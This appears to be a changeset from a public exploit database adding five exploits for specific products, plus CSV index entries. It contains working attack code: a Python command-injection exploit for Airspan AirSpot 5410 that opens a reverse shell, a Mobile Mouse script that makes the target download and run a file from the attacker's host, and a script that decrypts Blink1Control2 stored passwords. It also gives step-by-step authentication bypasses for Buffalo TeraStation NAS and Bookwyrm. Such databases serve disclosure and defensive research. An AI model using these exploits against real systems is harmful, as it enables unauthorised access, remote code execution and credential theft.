DB: 2022-09-21

5 changes to exploits/shellcodes

Blink1Control2 2.2.7 - Weak Password Encryption
Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass
Bookwyrm v0.4.3 - Authentication Bypass

exploits/hardware/webapps/51012.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass
+# Date: 2022-08-11
+# Exploit Author: JORDAN GLOVER
+# Type: WEBAPPS
+# Platform: HARDWARE
+# Vendor Homepage: https://www.buffalotech.com/
+# Model: TeraStation Series
+# Firmware Version: 1.66
+# Tested on: Windows 10
+
+
+An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges.
+
+The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS.
+
+Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body.
+
+If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS.
+
+
+POC #1 Authentication Failure
+
+Request
+POST /dynamic.pl HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/static/index.html
+
+bufaction=verifyLogin&user=Jordan&password=Jordan
+
+
+Response
+HTTP/1.1 200 OK
+Content-type: text/html
+Pragma: no-cache
+Cache-Control: no-store, no-cache, must-revalidate
+Cache-Control: post-check=0, pre-check=0
+Expires: Thu, 01 Dec 1994 16:00:00 GMT
+Connection: close
+Date: Mon, 30 Jun 2008 02:39:51 GMT
+Server: lighttpd/1.4.32
+Content-Length: 94
+
+{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}
+
+Incorrect Username or Password
+
+
+
+POC #2 Authentication Success
+
+Request
+POST /dynamic.pl HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/static/index.html
+
+bufaction=verifyLogin&user=Jordan&password=Jordan
+
+
+Intercepted Response
+HTTP/1.1 200 OK
+Content-type: text/html
+Pragma: no-cache
+Cache-Control: no-store, no-cache, must-revalidate
+Cache-Control: post-check=0, pre-check=0
+Expires: Thu, 01 Dec 1994 16:00:00 GMT
+Connection: close
+Date: Mon, 30 Jun 2008 02:39:51 GMT
+Server: lighttpd/1.4.32
+Content-Length: 94
+
+{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}
+
+Login Successful

exploits/linux/remote/51011.py

@@ -0,0 +1,79 @@
+# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
+# Date: 7/26/2022
+# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
+# Vendor Homepage: https://www.airspan.com/
+# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
+# Version: 0.3.4.1-4 and under.
+# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
+# CVE : CVE-2022-36267
+
+from __future__ import print_function, unicode_literals
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings()
+
+def banner():
+  airspanLogo = """
+      ,-.
+     / \  `.  __..-,O
+    :   \ --''_..-'.'
+    |    . .-' `. '.
+    :     .     .`.'
+     \     `.  /  ..
+      \      `.   ' .
+       `,       `.   \
+      ,|,`.        `-.\
+     '.||  ``-...__..-`
+      |  | Airspan
+      |__| AirSpot 5410
+      /||\ PWNED x_x
+     //||\\
+    // || \\
+ __//__||__\\__
+'--------------'Necrum Security Labs
+
+\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
+                FOR EDUCATIONAL PURPOSE ONLY.
+  """
+  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))
+
+def pingWebInterface(RHOST, RPORT):
+  url = 'https://{}:{}'.format(RHOST, RPORT)
+  try:
+    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
+    if response.status_code != 200:
+      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+      exit()
+    print('[INFO] Airspan device web interface seems reachable!')
+  except:
+    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+    exit()
+
+
+def execReverseShell(RHOST, RPORT, LHOST, LPORT):
+  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
+  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
+  try:
+    print('[INFO] Executing reverse shell...')
+    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
+    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
+    return
+  except Exception as e:
+      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
+      return False
+
+def main():
+  banner()
+  args = parser.parse_args()
+  pingWebInterface(args.RHOST, args.RPORT)
+  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
+
+
+if __name__ == "__main__":
+  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
+  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
+  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
+  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
+  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
+  main()

exploits/multiple/local/51014.js

@@ -0,0 +1,67 @@
+// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
+// Date: 2022-08-12
+// Exploit Author: p1ckzi
+// Vendor Homepage: https://thingm.com/
+// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
+// Vulnerable Version: blink1control2 <= 2.2.7
+// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
+// CVE: CVE-2022-35513
+//
+// Description:
+// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
+// of password storage which can be found by accessing the /blink1/input url
+// of the api server.
+// password ciphertext for skype logins and email are listed
+// and can be decrypted. example usage:
+// node blink1-pass-decrypt <ciphertext>
+#!/usr/bin/env node
+const {ArgumentParser} = require('argparse');
+const simpleCrypt = require('simplecrypt');
+
+function exploit() {
+  const BANNER = '\033[36m\n\
+     _     _ _       _    _\n\
+    | |__ | (_)_ __ | | _/ |      _ __   __ _ ___ ___\n\
+    | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
+    | |_) | | | | | |   <| |_____| |_) | (_| \\__ \\__ |_____|\n\
+    |_.__/|_|_|_| |_|_|\\_|_|     | .__/ \\__,_|___|___/\n\
+                                 |_|\n\
+         _                            _\n\
+      __| | ___  ___ _ __ _   _ _ __ | |_\n\
+     / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
+    | (_| |  __| (__| |  | |_| | |_) | |_\n\
+     \\__,_|\\___|\\___|_|   \\__, | .__/ \\__|\n\
+                          |___/|_|\033[39m';
+
+  const PARSER = new ArgumentParser({
+    description: 'decrypts passwords found at the /blink/input url '
+    + 'of the blink1control2 api server (version <= 2.2.7 ).'
+  });
+  PARSER.add_argument('ciphertext', {
+    help: 'encrypted password string to use', type: 'str'
+  });
+  let args = PARSER.parse_args();
+
+  // supplied ciphertext is decrypted with same salt, password, and method
+  // used for encryption:
+  try {
+    let crypt = simpleCrypt({
+      salt:     'boopdeeboop',
+      password: 'blink1control',
+      method:   'aes-192-ecb'
+    });
+    let ciphertext = args.ciphertext;
+    let decrypted = crypt.decrypt(ciphertext);
+    console.log(BANNER);
+    console.log('\033[32m[+] decrypted password:\033[39m');
+    console.log(decrypted);
+  }
+  catch (TypeError) {
+    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
+  }
+  finally {
+    process.exit(1);
+  }
+}
+
+exploit()

exploits/multiple/webapps/51013.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass
+# Date: 2022-08-4
+# Exploit Author: Akshay Ravi
+# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm
+# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3
+# Version: <= 4.0.3
+# Tested on: MacOS Monterey
+# CVE: CVE-2022-2651
+# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/
+
+Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection
+
+# Steps to reproduce:
+
+1. Create a acount with victims email id
+2. When the account is created, its ask for email confirmation via validating OTP
+Endpoint: https://site/confirm-email
+3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account

exploits/windows/remote/51010.py

@@ -0,0 +1,66 @@
+# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
+# Date: Aug 09, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://mobilemouse.com/
+# Software Link: https://www.mobilemouse.com/downloads/setup.exe
+# Version: 3.6.0.4
+# Tested on: Windows 10 Enterprise LTSC Build 17763
+
+#!/usr/bin/env python3
+
+import socket
+from time import sleep
+import argparse
+
+help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
+parser = argparse.ArgumentParser(description=help)
+parser.add_argument("--target", help="Target IP", required=True)
+parser.add_argument("--file", help="File name to Upload")
+parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
+
+args = parser.parse_args()
+
+host = args.target
+command_shell = args.file
+lhost = args.lhost
+port = 9099 # Default Port
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+
+CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
+s.send(CONN)
+run = s.recv(54)
+
+RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
+s.send(RUN)
+run = s.recv(54)
+
+sleep(0.5)
+
+download_string= f"curl http://{lhost}:8080/{command_shell} -o
+c:\Windows\Temp\{command_shell}".encode('utf-8')
+hex_shell = download_string.hex()
+SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" +
+"4b45591e2d311e454e5445521e04")
+s.send(SHELL)
+shell = s.recv(96)
+
+print ("Executing The Command Shell...")
+
+sleep(1.2)
+RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
+s.send(RUN2)
+run2 = s.recv(54)
+
+shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
+hex_run = shell_string.hex()
+RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" +
+"4b45591e2d311e454e5445521e04")
+s.send(RUN3)
+run3 = s.recv(96)
+
+print (" Take The Rose")
+
+sleep(10)
+s.close()

files_exploits.csv

@@ -11492,6 +11492,7 @@ id,file,description,date,author,type,platform,port
 50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows,
 50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows,
 50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",1970-01-01,"Angelo Pio Amirante",local,windows,
+51014,exploits/multiple/local/51014.js,"Blink1Control2 2.2.7 - Weak Password Encryption",1970-01-01,p1ckzi,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18722,6 +18723,8 @@ id,file,description,date,author,type,platform,port
 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
 51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
 51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
+51010,exploits/windows/remote/51010.py,"Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)",1970-01-01,"Chokri Hammedi",remote,windows,
+51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45071,3 +45074,5 @@ id,file,description,date,author,type,platform,port
 51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
 51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,
+51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware,
+51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,